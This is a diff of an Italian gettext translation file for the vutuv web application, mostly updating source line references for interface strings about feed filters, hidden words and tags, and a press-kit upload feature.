@@ -21454,7 +21454,7 @@ msgid "Feed language settings reset to the site defaults."
 msgstr ""
 "Impostazioni delle lingue del feed riportate ai valori predefiniti del sito."
 
-#: lib/vutuv_web/components/post_components.ex:6147
+#: lib/vutuv_web/components/post_components.ex:6150
 #: lib/vutuv_web/components/ui.ex:5549
 #: lib/vutuv_web/live/feed_languages_live.ex:65
 #: lib/vutuv_web/live/feed_languages_live.ex:200
@@ -21597,7 +21597,7 @@ msgid "Your username, or paste the address of your profile page."
 msgstr ""
 "Il Suo nome utente, oppure incolli l'indirizzo della Sua pagina di profilo."
 
-#: lib/vutuv_web/components/post_components.ex:5910
+#: lib/vutuv_web/components/post_components.ex:5913
 #, elixir-autogen, elixir-format
 msgid "Our AI is still checking it. As soon as it is through, the photo appears by itself."
 msgid_plural "Our AI is still checking them, %{done} of %{total} done. As soon as the last one is through, the photos appear by themselves."
@@ -21608,13 +21608,13 @@ msgstr[1] ""
 "La nostra IA le sta ancora controllando, %{done} su %{total} fatte. Appena "
 "avrà finito con l'ultima, le foto compariranno da sé."
 
-#: lib/vutuv_web/components/post_components.ex:5907
+#: lib/vutuv_web/components/post_components.ex:5910
 #, elixir-autogen, elixir-format
 msgid "Your post is published, the photo is not there yet."
 msgstr "Il Suo post è pubblicato, la foto non c'è ancora."
 
 #: lib/vutuv_web/components/post_components.ex:2913
-#: lib/vutuv_web/components/post_components.ex:4976
+#: lib/vutuv_web/components/post_components.ex:4979
 #, elixir-autogen, elixir-format
 msgid "Our AI is looking at it. It appears here by itself once it is through."
 msgid_plural "Our AI is looking at them. They appear here by themselves once they are through."
@@ -22281,7 +22281,7 @@ msgstr ""
 "e-mail posta disiscrizione newsletter campanella avviso silenzio meno "
 "browser desktop popup push notifica"
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:341
+#: lib/vutuv_web/live/tag_live/timeline.ex:342
 #, elixir-autogen, elixir-format
 msgid "%{formatted} active"
 msgstr "%{formatted} attivi"
@@ -22330,7 +22330,7 @@ msgstr ""
 "Segua #%{tag} da Mastodon o da qualsiasi altra app del Fediverso e i suoi "
 "post pubblici arriveranno nella Sua cronologia. Non serve un account vutuv."
 
-#: lib/vutuv_web/live/post_live/feed.ex:4128
+#: lib/vutuv_web/live/post_live/feed.ex:4126
 #, elixir-autogen, elixir-format
 msgid "Greet other members"
 msgstr "Saluti gli altri membri"
@@ -22816,13 +22816,13 @@ msgid "Hide a word or a whole phrase …"
 msgstr "Nascondi una parola o un'intera frase …"
 
 #: lib/vutuv_web/live/post_live/feed.ex:854
-#: lib/vutuv_web/live/post_live/feed.ex:4291
+#: lib/vutuv_web/live/post_live/feed.ex:4289
 #, elixir-autogen, elixir-format
 msgid "Hide tags"
 msgstr "Nascondi tag"
 
 #: lib/vutuv_web/live/post_live/feed.ex:853
-#: lib/vutuv_web/live/post_live/feed.ex:4280
+#: lib/vutuv_web/live/post_live/feed.ex:4278
 #, elixir-autogen, elixir-format
 msgid "Hide words"
 msgstr "Nascondi parole"
@@ -22889,7 +22889,7 @@ msgstr "I post con uno di questi tag vengono ridotti allo stesso modo."
 msgid "Posts containing one of these are folded to a single line — not deleted, and with a way to open them anyway."
 msgstr "I post che contengono una di queste parole vengono ridotti a una riga — non eliminati, e con un modo per aprirli comunque."
 
-#: lib/vutuv_web/live/post_live/feed.ex:4154
+#: lib/vutuv_web/live/post_live/feed.ex:4152
 #, elixir-autogen, elixir-format
 msgid "Put away:"
 msgstr "Messe da parte:"
@@ -22928,7 +22928,7 @@ msgid "Show posts by %{name}"
 msgstr "Mostra i post di %{name}"
 
 #: lib/vutuv_web/live/post_live/feed.ex:852
-#: lib/vutuv_web/live/post_live/feed.ex:4246
+#: lib/vutuv_web/live/post_live/feed.ex:4244
 #, elixir-autogen, elixir-format
 msgid "Sources"
 msgstr "Fonti"
@@ -22967,8 +22967,8 @@ msgid_plural "and %{formatted} more"
 msgstr[0] "e 1 altro"
 msgstr[1] "e altri %{formatted}"
 
-#: lib/vutuv_web/live/post_live/feed.ex:3711
-#: lib/vutuv_web/live/post_live/feed.ex:3738
+#: lib/vutuv_web/live/post_live/feed.ex:3709
+#: lib/vutuv_web/live/post_live/feed.ex:3736
 #, elixir-autogen, elixir-format
 msgctxt "feed filter sheet"
 msgid "Filter"
@@ -23000,7 +23000,7 @@ msgstr ""
 "verifica e comparirà al termine del controllo."
 
 #: lib/vutuv_web/live/organization_live/edit.ex:290
-#: lib/vutuv_web/live/press_kit_live.ex:1225
+#: lib/vutuv_web/live/press_kit_live.ex:1250
 #: lib/vutuv_web/templates/user/edit.html.heex:22
 #, elixir-autogen, elixir-format
 msgid "%{formats}, up to %{limit}"
@@ -23034,7 +23034,7 @@ msgid_plural "%{count} posts on %{day}"
 msgstr[0] "%{count} post il %{day}"
 msgstr[1] "%{count} post il %{day}"
 
-#: lib/vutuv_web/live/post_live/feed.ex:3915
+#: lib/vutuv_web/live/post_live/feed.ex:3913
 #, elixir-autogen, elixir-format
 msgid "Back to now"
 msgstr "Torna al presente"
@@ -23044,7 +23044,7 @@ msgstr "Torna al presente"
 msgid "Busy month: the shading counts at least this much."
 msgstr "Mese intenso: la tonalità indica almeno questo valore."
 
-#: lib/vutuv_web/live/post_live/feed.ex:3961
+#: lib/vutuv_web/live/post_live/feed.ex:3959
 #, elixir-autogen, elixir-format
 msgid "Load the whole day (%{formatted} post)"
 msgid_plural "Load the whole day (%{formatted} posts)"
@@ -23066,7 +23066,7 @@ msgstr "Mese successivo"
 msgid "Next year"
 msgstr "Anno successivo"
 
-#: lib/vutuv_web/live/post_live/feed.ex:3911
+#: lib/vutuv_web/live/post_live/feed.ex:3909
 #, elixir-autogen, elixir-format
 msgid "Nothing reached your feed on %{day}."
 msgstr "Il %{day} non è arrivato nulla nel Suo feed."
@@ -23160,7 +23160,7 @@ msgid_plural "New (%{formatted}):"
 msgstr[0] "Nuovo:"
 msgstr[1] "Nuovi (%{formatted}):"
 
-#: lib/vutuv_web/components/post_components.ex:3802
+#: lib/vutuv_web/components/post_components.ex:3805
 #, elixir-autogen, elixir-format
 msgid "Quoted post"
 msgstr "Post citato"
@@ -23216,7 +23216,7 @@ msgstr "Solo questi account (vuoto = tutti) …"
 msgid "only %{account}"
 msgstr "solo %{account}"
 
-#: lib/vutuv_web/components/post_components.ex:7600
+#: lib/vutuv_web/components/post_components.ex:7576
 #: lib/vutuv_web/live/post_live/filter_band.ex:290
 #: lib/vutuv_web/live/post_live/filter_band.ex:379
 #, elixir-autogen, elixir-format
@@ -23400,7 +23400,7 @@ msgctxt "phone tab bar"
 msgid "Write"
 msgstr "Scrivi"
 
-#: lib/vutuv_web/live/post_live/feed.ex:4049
+#: lib/vutuv_web/live/post_live/feed.ex:4047
 #: lib/vutuv_web/live/post_rewrites_live.ex:287
 #, elixir-autogen, elixir-format
 msgid "%{formatted} rule"
@@ -23470,7 +23470,7 @@ msgstr "Regole che riscrivono il testo dei post di un account prima che Lei li l
 
 #: lib/vutuv_web/components/post_components.ex:1457
 #: lib/vutuv_web/components/post_components.ex:3407
-#: lib/vutuv_web/components/post_components.ex:4766
+#: lib/vutuv_web/components/post_components.ex:4769
 #: lib/vutuv_web/components/ui.ex:5541
 #: lib/vutuv_web/live/post_rewrites_live.ex:76
 #: lib/vutuv_web/live/post_rewrites_live.ex:262
@@ -23701,7 +23701,7 @@ msgstr[1] "%{formatted} nuovi follower"
 msgid "Last 30 days: %{parts}"
 msgstr "Ultimi 30 giorni: %{parts}"
 
-#: lib/vutuv_web/components/post_components.ex:5328
+#: lib/vutuv_web/components/post_components.ex:5331
 #: lib/vutuv_web/live/notification_live/index.ex:1003
 #, elixir-autogen, elixir-format
 msgid "Less"
@@ -24016,7 +24016,7 @@ msgid "Hidden. What they pass on stays out of your feed; their own posts do not.
 msgstr "Nascosto. Ciò che questo account ripubblica non compare più nel Suo feed, i suoi post sì."
 
 #: lib/vutuv_web/components/post_components.ex:3379
-#: lib/vutuv_web/components/post_components.ex:4760
+#: lib/vutuv_web/components/post_components.ex:4763
 #, elixir-autogen, elixir-format
 msgid "Hide reposts"
 msgstr "Nascondi le ripubblicazioni"
@@ -24197,8 +24197,8 @@ msgstr ""
 msgid "Posts loaded at once"
 msgstr ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:3985
-#: lib/vutuv_web/live/post_live/feed.ex:3989
+#: lib/vutuv_web/live/post_live/feed.ex:3983
+#: lib/vutuv_web/live/post_live/feed.ex:3987
 #, elixir-autogen, elixir-format
 msgid "Posts per page"
 msgstr "Post per pagina"
@@ -24213,60 +24213,60 @@ msgstr ""
 msgid "feed length page size posts number amount load more scroll paging seite länge anzahl beiträge nachladen mehr laden umfang"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7591
-#: lib/vutuv_web/components/post_components.ex:7592
+#: lib/vutuv_web/components/post_components.ex:7567
+#: lib/vutuv_web/components/post_components.ex:7568
 #, elixir-autogen, elixir-format
 msgid "A word or phrase …"
 msgstr "Una parola o un'espressione …"
 
-#: lib/vutuv_web/components/post_components.ex:7619
+#: lib/vutuv_web/components/post_components.ex:7595
 #, elixir-autogen, elixir-format
 msgid "For whom %{thing} is hidden"
 msgstr "Per chi %{thing} viene nascosto"
 
-#: lib/vutuv_web/live/post_live/feed.ex:4046
-#: lib/vutuv_web/live/post_live/feed.ex:4210
-#: lib/vutuv_web/live/post_live/feed.ex:4219
+#: lib/vutuv_web/live/post_live/feed.ex:4044
+#: lib/vutuv_web/live/post_live/feed.ex:4208
+#: lib/vutuv_web/live/post_live/feed.ex:4217
 #, elixir-autogen, elixir-format
 msgid "Hidden"
 msgstr "Nascosti"
 
-#: lib/vutuv_web/live/post_live/feed.ex:4184
+#: lib/vutuv_web/live/post_live/feed.ex:4182
 #, elixir-autogen, elixir-format
 msgid "Hide something from your feed"
 msgstr "Nascondi qualcosa dal tuo feed"
 
-#: lib/vutuv_web/components/post_components.ex:7537
+#: lib/vutuv_web/components/post_components.ex:7513
 #, elixir-autogen, elixir-format
 msgid "Stop showing"
 msgstr "Non mostrare più"
 
-#: lib/vutuv_web/live/post_live/feed.ex:4225
+#: lib/vutuv_web/live/post_live/feed.ex:4223
 #, elixir-autogen, elixir-format
 msgid "Whatever these match is folded to a single line in your feed."
 msgstr "Ciò che corrisponde viene ridotto a una riga nel tuo feed."
 
-#: lib/vutuv_web/live/post_live/feed.ex:4245
+#: lib/vutuv_web/live/post_live/feed.ex:4243
 #, elixir-autogen, elixir-format
 msgid "Words & tags"
 msgstr "Parole e tag"
 
-#: lib/vutuv_web/components/post_components.ex:7623
+#: lib/vutuv_web/components/post_components.ex:7599
 #, elixir-autogen, elixir-format
 msgid "everyone"
 msgstr "per tutti"
 
-#: lib/vutuv_web/components/post_components.ex:7626
+#: lib/vutuv_web/components/post_components.ex:7602
 #, elixir-autogen, elixir-format
 msgid "only %{handle}"
 msgstr "solo %{handle}"
 
-#: lib/vutuv_web/components/post_components.ex:7595
+#: lib/vutuv_web/components/post_components.ex:7571
 #, elixir-autogen, elixir-format
 msgid "this word"
 msgstr "questa parola"
 
-#: lib/vutuv_web/components/post_components.ex:7636
+#: lib/vutuv_web/components/post_components.ex:7612
 #, elixir-autogen, elixir-format
 msgid "only %{server}"
 msgstr "solo %{server}"
@@ -24318,7 +24318,7 @@ msgstr "Questo sito è offline in questo momento."
 msgid "The site itself is running, this address just is not one of ours. The link is probably old, or it carries a typo."
 msgstr "Il sito funziona, è questo indirizzo a non essere uno dei nostri. Probabilmente il link è vecchio oppure contiene un errore di battitura."
 
-#: lib/vutuv_web/components/post_components.ex:6941
+#: lib/vutuv_web/components/post_components.ex:6944
 #, elixir-autogen, elixir-format
 msgid "Show this screenshot larger"
 msgstr "Ingrandisci lo screenshot"
@@ -24409,7 +24409,7 @@ msgid "Hidden. What other people pass on of them stays out of your feed; their o
 msgstr "Nascosto. Ciò che altri ripubblicano di questo account non compare più nel Suo feed, i suoi post sì."
 
 #: lib/vutuv_web/components/post_components.ex:3365
-#: lib/vutuv_web/components/post_components.ex:4748
+#: lib/vutuv_web/components/post_components.ex:4751
 #, elixir-autogen, elixir-format
 msgid "Hide when others repost them"
 msgstr "Nascondi quando altri lo ripubblicano"
@@ -25171,13 +25171,13 @@ msgstr "il modulo di segnalazione"
 msgid "“%{note}”"
 msgstr "“%{note}”"
 
-#: lib/vutuv_web/components/post_components.ex:5506
+#: lib/vutuv_web/components/post_components.ex:5509
 #: lib/vutuv_web/components/press_kit_components.ex:216
 #, elixir-autogen, elixir-format
 msgid "Show these photos larger"
 msgstr "Ingrandisci le foto"
 
-#: lib/vutuv_web/components/post_components.ex:5692
+#: lib/vutuv_web/components/post_components.ex:5695
 #, elixir-autogen, elixir-format
 msgid "Show this photo larger"
 msgstr "Ingrandisci la foto"
@@ -25196,48 +25196,48 @@ msgid_plural "%{formatted} more entries (%{years})"
 msgstr[0] "Un'altra voce (%{years})"
 msgstr[1] "Altre %{formatted} voci (%{years})"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1299
+#: lib/vutuv_web/live/press_kit_live.ex:1324
 #, elixir-autogen, elixir-format
 msgid "%{percent}%"
 msgstr "%{percent}%"
 
-#: lib/vutuv_web/live/press_kit_live.ex:847
+#: lib/vutuv_web/live/press_kit_live.ex:872
 #, elixir-autogen, elixir-format
 msgid "%{used} of %{max}"
 msgstr "%{used} di %{max}"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1133
+#: lib/vutuv_web/live/press_kit_live.ex:1158
 #, elixir-autogen, elixir-format
 msgid "A photographer's @handle links to their profile and notifies nobody."
 msgstr "L'@handle di un fotografo rimanda al suo profilo e non avvisa nessuno."
 
-#: lib/vutuv_web/live/press_kit_live.ex:1218
+#: lib/vutuv_web/live/press_kit_live.ex:1243
 #, elixir-autogen, elixir-format
 msgid "Add a logo variant"
 msgstr "Aggiungere una variante del logo"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1219
+#: lib/vutuv_web/live/press_kit_live.ex:1244
 #, elixir-autogen, elixir-format
 msgid "Add a press photo"
 msgstr "Aggiungere una foto per la stampa"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1095
+#: lib/vutuv_web/live/press_kit_live.ex:1120
 #, elixir-autogen, elixir-format
 msgid "At the desk in the Bonn office"
 msgstr "Alla scrivania nell'ufficio di Bonn"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1127
+#: lib/vutuv_web/live/press_kit_live.ex:1152
 #, elixir-autogen, elixir-format
 msgid "Caption"
 msgstr "Didascalia"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1105
-#: lib/vutuv_web/live/press_kit_live.ex:1170
+#: lib/vutuv_web/live/press_kit_live.ex:1130
+#: lib/vutuv_web/live/press_kit_live.ex:1195
 #, elixir-autogen, elixir-format
 msgid "Credit"
 msgstr "Crediti"
 
-#: lib/vutuv_web/live/press_kit_live.ex:864
+#: lib/vutuv_web/live/press_kit_live.ex:889
 #, elixir-autogen, elixir-format
 msgid "Dark"
 msgstr "Scuro"
@@ -25247,22 +25247,22 @@ msgstr "Scuro"
 msgid "Files a journalist may download and print"
 msgstr "File che una redazione può scaricare e stampare"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1016
+#: lib/vutuv_web/live/press_kit_live.ex:1041
 #, elixir-autogen, elixir-format
 msgid "First: the main photo"
 msgstr "Al primo posto: la foto principale"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1015
+#: lib/vutuv_web/live/press_kit_live.ex:1040
 #, elixir-autogen, elixir-format
 msgid "First: the main variant"
 msgstr "Al primo posto: la variante principale"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1193
+#: lib/vutuv_web/live/press_kit_live.ex:1218
 #, elixir-autogen, elixir-format
 msgid "I hold the rights to this file and release it for editorial use, as long as the credit above is shown."
 msgstr "Detengo i diritti su questo file e lo rilascio per uso editoriale, purché vengano indicati i crediti qui sopra."
 
-#: lib/vutuv_web/live/press_kit_live.ex:864
+#: lib/vutuv_web/live/press_kit_live.ex:889
 #, elixir-autogen, elixir-format
 msgid "Light"
 msgstr "Chiaro"
@@ -25274,13 +25274,13 @@ msgstr "Variante del logo"
 
 #: lib/vutuv_web/agent_docs/markdown.ex:123
 #: lib/vutuv_web/agent_docs/text.ex:414
-#: lib/vutuv_web/live/press_kit_live.ex:838
+#: lib/vutuv_web/live/press_kit_live.ex:863
 #: lib/vutuv_web/templates/press_kit/index.html.heex:55
 #, elixir-autogen, elixir-format
 msgid "Logo variants"
 msgstr "Varianti del logo"
 
-#: lib/vutuv_web/live/press_kit_live.ex:878
+#: lib/vutuv_web/live/press_kit_live.ex:903
 #, elixir-autogen, elixir-format
 msgid "No logo here yet."
 msgstr "Qui non c'è ancora nessun logo."
@@ -25295,13 +25295,13 @@ msgstr "Non più di %{max} varianti del logo."
 msgid "No more than %{max} press photos."
 msgstr "Non più di %{max} foto per la stampa."
 
-#: lib/vutuv_web/live/press_kit_live.ex:879
+#: lib/vutuv_web/live/press_kit_live.ex:904
 #, elixir-autogen, elixir-format
 msgid "No press photo here yet."
 msgstr "Qui non c'è ancora nessuna foto per la stampa."
 
-#: lib/vutuv_web/live/press_kit_live.ex:1114
-#: lib/vutuv_web/live/press_kit_live.ex:1180
+#: lib/vutuv_web/live/press_kit_live.ex:1139
+#: lib/vutuv_web/live/press_kit_live.ex:1205
 #, elixir-autogen, elixir-format
 msgid "Photo: Ada King"
 msgstr "Foto: Ada King"
@@ -25311,7 +25311,7 @@ msgstr "Foto: Ada King"
 msgid "Picture removed."
 msgstr "Immagine rimossa."
 
-#: lib/vutuv_web/live/press_kit_live.ex:537
+#: lib/vutuv_web/live/press_kit_live.ex:562
 #, elixir-autogen, elixir-format
 msgid "Please confirm the rights first, then choose the file."
 msgstr "Confermi prima i diritti e scelga poi il file."
@@ -25323,63 +25323,63 @@ msgstr "Foto per la stampa"
 
 #: lib/vutuv_web/agent_docs/markdown.ex:122
 #: lib/vutuv_web/agent_docs/text.ex:413
-#: lib/vutuv_web/live/press_kit_live.ex:838
+#: lib/vutuv_web/live/press_kit_live.ex:863
 #: lib/vutuv_web/templates/press_kit/index.html.heex:46
 #, elixir-autogen, elixir-format
 msgid "Press photos"
 msgstr "Foto per la stampa"
 
-#: lib/vutuv_web/live/press_kit_live.ex:862
+#: lib/vutuv_web/live/press_kit_live.ex:887
 #, elixir-autogen, elixir-format
 msgid "Show tiles on:"
 msgstr "Mostrare i riquadri su:"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1117
+#: lib/vutuv_web/live/press_kit_live.ex:1142
 #, elixir-autogen, elixir-format
 msgid "Shown beside the picture and asked for with every download."
 msgstr "Compaiono accanto all'immagine e sono richiesti a ogni download."
 
-#: lib/vutuv_web/live/press_kit_live.ex:550
+#: lib/vutuv_web/live/press_kit_live.ex:575
 #, elixir-autogen, elixir-format
 msgid "That could not be saved."
 msgstr "Non è stato possibile salvare."
 
-#: lib/vutuv_web/live/press_kit_live.ex:1338
+#: lib/vutuv_web/live/press_kit_live.ex:1363
 #, elixir-autogen, elixir-format
 msgid "The first photo is the one shown first. Drag a tile, or use the arrows, to change the order."
 msgstr "La prima foto è quella mostrata per prima. Trascini un riquadro oppure usi le frecce per cambiare l'ordine."
 
-#: lib/vutuv_web/live/press_kit_live.ex:947
+#: lib/vutuv_web/live/press_kit_live.ex:972
 #, elixir-autogen, elixir-format
 msgid "This shelf is full. Remove one picture to add another."
 msgstr "Qui non c'è più spazio. Rimuova un'immagine per aggiungerne un'altra."
 
-#: lib/vutuv_web/live/press_kit_live.ex:797
+#: lib/vutuv_web/live/press_kit_live.ex:822
 #, elixir-autogen, elixir-format
 msgid "What a journalist writing about you may download: photos in print quality and your logo as a file. Everything here is public and free for editorial use as long as your credit is shown."
 msgstr "Ciò che una redazione che scrive di Lei può scaricare: foto in qualità di stampa e il Suo logo come file. Tutto qui è pubblico e libero per uso editoriale, purché vengano indicati i Suoi crediti."
 
-#: lib/vutuv_web/live/press_kit_live.ex:1083
+#: lib/vutuv_web/live/press_kit_live.ex:1108
 #, elixir-autogen, elixir-format
 msgid "What the picture shows"
 msgstr "Che cosa mostra l'immagine"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1082
+#: lib/vutuv_web/live/press_kit_live.ex:1107
 #, elixir-autogen, elixir-format
 msgid "Which variant this is"
 msgstr "Di quale variante si tratta"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1094
+#: lib/vutuv_web/live/press_kit_live.ex:1119
 #, elixir-autogen, elixir-format
 msgid "White on a dark background"
 msgstr "Bianco su sfondo scuro"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1128
+#: lib/vutuv_web/live/press_kit_live.ex:1153
 #, elixir-autogen, elixir-format
 msgid "Who took it, where, and what may be cropped."
 msgstr "Chi l'ha scattata, dove e che cosa si può ritagliare."
 
-#: lib/vutuv_web/live/press_kit_live.ex:1330
+#: lib/vutuv_web/live/press_kit_live.ex:1355
 #, elixir-autogen, elixir-format
 msgid "Your logo as a file, one tile per variant. A vector (SVG) is what a printer asks for; a PNG is what everybody else can open."
 msgstr "Il Suo logo come file, un riquadro per variante. Una tipografia chiede un vettoriale (SVG); tutti gli altri possono aprire un PNG."
@@ -25396,14 +25396,14 @@ msgid_plural "%{count} bytes"
 msgstr[0] "%{count} byte"
 msgstr[1] "%{count} byte"
 
-#: lib/vutuv_web/agent_docs/markdown.ex:1560
-#: lib/vutuv_web/agent_docs/text.ex:993
+#: lib/vutuv_web/agent_docs/markdown.ex:1564
+#: lib/vutuv_web/agent_docs/text.ex:995
 #, elixir-autogen, elixir-format
 msgid "Credit: %{credit}"
 msgstr "Credito: %{credit}"
 
-#: lib/vutuv_web/components/press_kit_components.ex:380
-#: lib/vutuv_web/components/press_kit_components.ex:383
+#: lib/vutuv_web/components/press_kit_components.ex:386
+#: lib/vutuv_web/components/press_kit_components.ex:389
 #, elixir-autogen, elixir-format
 msgid "Download %{format}"
 msgstr "Scarica %{format}"
@@ -25413,12 +25413,12 @@ msgstr "Scarica %{format}"
 msgid "Download photo"
 msgstr "Scarica la foto"
 
-#: lib/vutuv/press_kit.ex:788
+#: lib/vutuv/press_kit.ex:811
 #, elixir-autogen, elixir-format
 msgid "Free for editorial use with credit."
 msgstr "Libera per uso editoriale, citando il credito."
 
-#: lib/vutuv_web/agent_docs/markdown.ex:1563
+#: lib/vutuv_web/agent_docs/markdown.ex:1567
 #, elixir-autogen, elixir-format
 msgid "PNG version"
 msgstr "Versione PNG"
@@ -25438,27 +25438,27 @@ msgstr "Queste immagini sono offerte per uso editoriale. Usatele liberamente nei
 msgid "Video is being checked"
 msgstr "Il video è in fase di controllo"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1251
+#: lib/vutuv_web/live/press_kit_live.ex:1276
 #, elixir-autogen, elixir-format
 msgid "Copies the vector file this page's logo was uploaded as onto this shelf."
 msgstr "Copia qui il file vettoriale con cui è stato caricato il logo di questa pagina."
 
-#: lib/vutuv_web/live/press_kit_live.ex:1324
+#: lib/vutuv_web/live/press_kit_live.ex:1349
 #, elixir-autogen, elixir-format
 msgid "The page's logo as a file, one tile per variant. A vector (SVG) is what a printer asks for; a PNG is what everybody else can open."
 msgstr "Il logo di questa pagina come file, un riquadro per variante. Una tipografia chiede un vettoriale (SVG); tutti gli altri possono aprire un PNG."
 
-#: lib/vutuv_web/live/press_kit_live.ex:1248
+#: lib/vutuv_web/live/press_kit_live.ex:1273
 #, elixir-autogen, elixir-format
 msgid "Use the page's own logo"
 msgstr "Usa il logo di questa pagina"
 
-#: lib/vutuv_web/live/press_kit_live.ex:779
+#: lib/vutuv_web/live/press_kit_live.ex:804
 #, elixir-autogen, elixir-format
 msgid "What a journalist writing about this page may download: photos in print quality and its logo as a file. Everything here is public and free for editorial use as long as the credit is shown."
 msgstr "Ciò che una redazione che scrive di questa pagina può scaricare: foto in qualità di stampa e il suo logo come file. Tutto qui è pubblico e libero per uso editoriale, purché vengano indicati i crediti."
 
-#: lib/vutuv_web/components/press_kit_components.ex:570
+#: lib/vutuv_web/components/press_kit_components.ex:607
 #: lib/vutuv_web/components/ui.ex:3281
 #, elixir-autogen, elixir-format
 msgid "Report this picture"
@@ -25586,12 +25586,12 @@ msgstr "Media Kit"
 msgid "Media Kit of %{name}"
 msgstr "Media Kit di %{name}"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1344
+#: lib/vutuv_web/live/press_kit_live.ex:1369
 #, elixir-autogen, elixir-format
 msgid "Remove this picture from this page's Media Kit?"
 msgstr "Rimuovere questa immagine dal Media Kit di questa pagina?"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1346
+#: lib/vutuv_web/live/press_kit_live.ex:1371
 #, elixir-autogen, elixir-format
 msgid "Remove this picture from your Media Kit?"
 msgstr "Rimuovere questa immagine dal Suo Media Kit?"
@@ -25611,8 +25611,8 @@ msgstr "Non può aggiungere un'immagine a questo Media Kit."
 msgid "press kit media journalist photographer download original print logo svg credit copyright presse pressefotos pressemappe medienkit mediakit fotos logo herunterladen bildnachweis"
 msgstr "media kit mediakit kit stampa media redazione giornalista fotografo download originale stampa logo svg crediti copyright foto scaricare"
 
-#: lib/vutuv_web/components/post_components.ex:4664
-#: lib/vutuv_web/components/post_components.ex:4714
+#: lib/vutuv_web/components/post_components.ex:4667
+#: lib/vutuv_web/components/post_components.ex:4717
 #, elixir-autogen, elixir-format
 msgid "Copy link to post"
 msgstr "Copia il link al post"
@@ -25701,14 +25701,14 @@ msgstr "Ha esaurito il Suo limite di caricamento per oggi. Si libera di nuovo ne
 msgid "Your uploads are not limited."
 msgstr "I Suoi caricamenti non hanno limiti."
 
-#: lib/vutuv_web/live/press_kit_live.ex:672
+#: lib/vutuv_web/live/press_kit_live.ex:697
 #, elixir-autogen, elixir-format
 msgid "%{formatted} word"
 msgid_plural "%{formatted} words"
 msgstr[0] "%{formatted} parola"
 msgstr[1] "%{formatted} parole"
 
-#: lib/vutuv_web/live/press_kit_live.ex:756
+#: lib/vutuv_web/live/press_kit_live.ex:781
 #, elixir-autogen, elixir-format
 msgid "A paragraph an article can end on."
 msgstr "Un paragrafo con cui un articolo può chiudersi."
@@ -25720,22 +25720,22 @@ msgstr "Un paragrafo con cui un articolo può chiudersi."
 msgid "About %{name}"
 msgstr "Su %{name}"
 
-#: lib/vutuv_web/live/press_kit_live.ex:749
+#: lib/vutuv_web/live/press_kit_live.ex:774
 #, elixir-autogen, elixir-format
 msgid "About %{words} words. A paragraph at the end of an article."
 msgstr "Circa %{words} parole. Un paragrafo alla fine di un articolo."
 
-#: lib/vutuv_web/live/press_kit_live.ex:743
+#: lib/vutuv_web/live/press_kit_live.ex:768
 #, elixir-autogen, elixir-format
 msgid "About %{words} words. The two sentences under a photo."
 msgstr "Circa %{words} parole. Le due frasi sotto una foto."
 
-#: lib/vutuv_web/live/press_kit_live.ex:723
+#: lib/vutuv_web/live/press_kit_live.ex:748
 #, elixir-autogen, elixir-format
 msgid "An @handle links to that profile and notifies nobody."
 msgstr "Una @handle rimanda a quel profilo e non avvisa nessuno."
 
-#: lib/vutuv_web/live/press_kit_live.ex:753
+#: lib/vutuv_web/live/press_kit_live.ex:778
 #, elixir-autogen, elixir-format
 msgid "As long as you like. The whole portrait."
 msgstr "Lunga quanto vuole. Il ritratto completo."
@@ -25750,7 +25750,7 @@ msgstr "Versione lunga"
 msgid "Medium version"
 msgstr "Versione media"
 
-#: lib/vutuv_web/live/press_kit_live.ex:681
+#: lib/vutuv_web/live/press_kit_live.ex:706
 #, elixir-autogen, elixir-format
 msgid "Nothing written yet."
 msgstr "Non ha ancora scritto nulla."
@@ -25765,22 +25765,22 @@ msgstr "Versione breve"
 msgid "Take whichever length fits the space you have. Each one stands on its own."
 msgstr "Prenda la lunghezza che entra nello spazio che ha. Ognuna sta in piedi da sola."
 
-#: lib/vutuv_web/live/press_kit_live.ex:757
+#: lib/vutuv_web/live/press_kit_live.ex:782
 #, elixir-autogen, elixir-format
 msgid "The whole story, for as long as it needs."
 msgstr "Tutta la storia, per quanto serve."
 
-#: lib/vutuv_web/live/press_kit_live.ex:630
+#: lib/vutuv_web/live/press_kit_live.ex:655
 #, elixir-autogen, elixir-format
 msgid "Three bios in three lengths, so a journalist can take the one that fits. You write them; nothing is made out of your CV."
 msgstr "Tre biografie in tre lunghezze, così una redazione prende quella che le serve. Le scrive Lei; dal Suo curriculum non viene ricavato nulla."
 
-#: lib/vutuv_web/live/press_kit_live.ex:755
+#: lib/vutuv_web/live/press_kit_live.ex:780
 #, elixir-autogen, elixir-format
 msgid "Two sentences a caption can carry."
 msgstr "Due frasi che entrano in una didascalia."
 
-#: lib/vutuv_web/live/press_kit_live.ex:691
+#: lib/vutuv_web/live/press_kit_live.ex:716
 #, elixir-autogen, elixir-format
 msgid "Write"
 msgstr "Scrivi"
@@ -25890,7 +25890,7 @@ msgstr "rifiutato"
 msgid "Your post appears as soon as the video is ready"
 msgstr "Il suo post apparirà non appena il video sarà pronto"
 
-#: lib/vutuv_web/components/post_components.ex:3649
+#: lib/vutuv_web/components/post_components.ex:3653
 #, elixir-autogen, elixir-format
 msgid "Found through %{server}"
 msgstr "Trovato tramite %{server}"
@@ -26089,22 +26089,22 @@ msgstr[1] "Segui %{tag}. Oggi %{uses} post su %{servers} server, contro %{baseli
 msgid "Very busy on other servers right now:"
 msgstr "Ora molto attivi su altri server:"
 
-#: lib/vutuv_web/live/press_kit_live.ex:904
+#: lib/vutuv_web/live/press_kit_live.ex:929
 #, elixir-autogen, elixir-format
 msgid "A picture still being checked is not public yet."
 msgstr "Un'immagine ancora in verifica non è ancora pubblica."
 
-#: lib/vutuv_web/live/press_kit_live.ex:907
+#: lib/vutuv_web/live/press_kit_live.ex:932
